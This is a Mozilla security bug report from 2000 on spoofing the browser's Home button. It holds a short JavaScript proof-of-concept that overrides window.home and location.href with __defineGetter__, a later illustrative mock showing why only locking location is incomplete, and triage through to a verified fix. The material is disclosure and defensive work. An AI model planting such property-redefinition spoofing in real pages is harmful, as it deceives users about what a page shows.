Bug 44014: spoofing user's "Home"
Status: Closed (VERIFIED FIXED), mozilla0.9.1
Opened 24 years ago; closed 24 years ago
Categories: Core :: Security, defect, P2
People: Reporter: security-bugs, Assigned: security-bugs
Whiteboard: [need reviews]
Attachments: 1 file (patch, 1.75 KB)
Date: Mon, 26 Jun 2000 16:48:03 +0300
From: Georgi Guninski <joro@nat.bg>
To: Mitchell Stoltz <mstoltz@netscape.com>
It is possible to change the behavior of clicking the "Home" button or
choosing "Go|Home" from the menu.
The exploit uses __defineGetter__ and redefinition of window.home().
I think that allowing redefinition of predefined functions is not a good
idea.
The code is:
---------------------------------------
Press the "Home" button or choose "Go|Home" in the other window in 2
seconds.
<SCRIPT>
a=window.open("about:blank","a");
function f()
{
a.location.__defineGetter__("href",function() {return "http://www.yahoo.com"});
a.window.home=new Function("this.document.body.innerHTML='Spoofed'");
a.window.home();
}
setTimeout("f()",2000);
</SCRIPT>
---------------------------------------
Comment 1•24 years ago (Assignee)
This testcase does not behave as described, but the vulnerabilities mentioned
should be addressed.
Updated•24 years ago (Assignee)
Status: NEW → ASSIGNED
Comment 2•24 years ago (Assignee)
Can't duplicate this exploit, marking M18 for post-Beta2. Re-address this exploit
and look at the issue of redefining properties.
Target Milestone: --- → M18
Comment 3•24 years ago (Assignee)
Fixing 36946 by marking key properties as PERMANENT will fix this too. As for
__defineGetter__, this should be fixed now, I think.
Depends on: 36946
Comment 4•24 years ago (Assignee)
I think this no longer works, marking nsbeta3 to remind myself to look at it.
Keywords: nsbeta3
Priority: P3 → P2
Comment 5•24 years ago (Assignee)
Nominating for RTM, and I have opened bug 54976 on the __defineGetter__ aspect
of this bug. Patrick, can you give me a + ?
Keywords: rtm
Comment 6•24 years ago (Assignee)
Comment 7•24 years ago (Assignee)
I've posted jst's patch which adds JSPROP_PERMANENT to the location property.
This doesn't completely fix the problem. Looks like we have to protect
location.href as well.
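
The gap Comment 7 describes, as an added example (not code from this bug or from Mozilla): a mock window object in which `configurable: false` stands in for JSPROP_PERMANENT, showing that a permanent `location` still leaves `location.href` open to `__defineGetter__` until `href` is locked as well. `makeWindow`, `tryGetter`, `probe`, `redefinable` and the example URLs are hypothetical names constructed for this illustration.

```javascript
// Constructed stand-in for a browser window object; not Mozilla code.
// lockLocation / lockHref choose which properties are made permanent.
function makeWindow({ lockLocation, lockHref }) {
  const location = {};
  Object.defineProperty(location, "href", {
    value: "http://home.example/",
    enumerable: true,
    writable: false,
    configurable: !lockHref,
  });
  const win = {};
  Object.defineProperty(win, "location", {
    value: location,
    enumerable: true,
    writable: false,
    configurable: !lockLocation, // false here plays the role of JSPROP_PERMANENT
  });
  return win;
}

// Attempt one redefinition; report whether the engine accepted it.
function tryGetter(obj, name, getter) {
  try {
    obj.__defineGetter__(name, getter);
    return true;
  } catch (e) {
    return false; // TypeError: the property is non-configurable
  }
}

// Apply the two redefinitions discussed in the bug and return what a caller
// reading win.location.href would observe afterwards.
function probe(win) {
  const locationReplaced = tryGetter(win, "location", () => ({ href: "http://spoof.example/" }));
  const hrefReplaced = tryGetter(win.location, "href", () => "http://spoof.example/");
  return { locationReplaced, hrefReplaced, observedHref: win.location.href };
}

// Audit helper: own properties that script can still redefine.
function redefinable(obj) {
  return Object.getOwnPropertyNames(obj).filter(
    (name) => Object.getOwnPropertyDescriptor(obj, name).configurable
  );
}
```

Running `redefinable` over each object a trusted code path reads from lists the properties that still need locking.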
Comment 8•24 years ago
Mitch, are you happy with the patch in this bug? Can it go to reviews? (Is it
OK to strcmp against "LOCATION" vs "location" or using strcasecmp?) The fix is
reasonably small. If you think it's correct, it _might_ get approved for RTM...
Whiteboard: [need reviews]
Comment 9•24 years ago (Assignee)
This patch is not a complete fix. We need to restrict "location.href" as well.
I'll see about getting this done.
Updated•24 years ago
QA Contact: czhang → junruh
Comment 10•24 years ago (Assignee)
Future, since the fix is not ready yet.
Target Milestone: M18 → Future
Comment 11•24 years ago (Assignee)
removing rtm.
Comment 13•24 years ago (Assignee)
Mass changing milestones to Moz0.9.1. Many of these bugs are dependent on the
XPConnected DOM and its associated security UI changes.
Target Milestone: Future → mozilla0.9.1
Comment 14•24 years ago (Assignee)
Georgi thinks this is no longer an issue. You can still redefine window.home()
but this doesn't change the behavior of the Home button anymore. There are a few
other bugs dealing with redefining built-in properties, but that's covered
elsewhere, so I'm closing this one.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Comment 15•24 years ago
Marking VERIFIED FIXED per originator on:
-MacOS91 2001-05-21-15-trunk
-Win98SE 2001-05-22-06-trunk
-LinRH62 2001-05-22-05-trunk
Status: RESOLVED → VERIFIED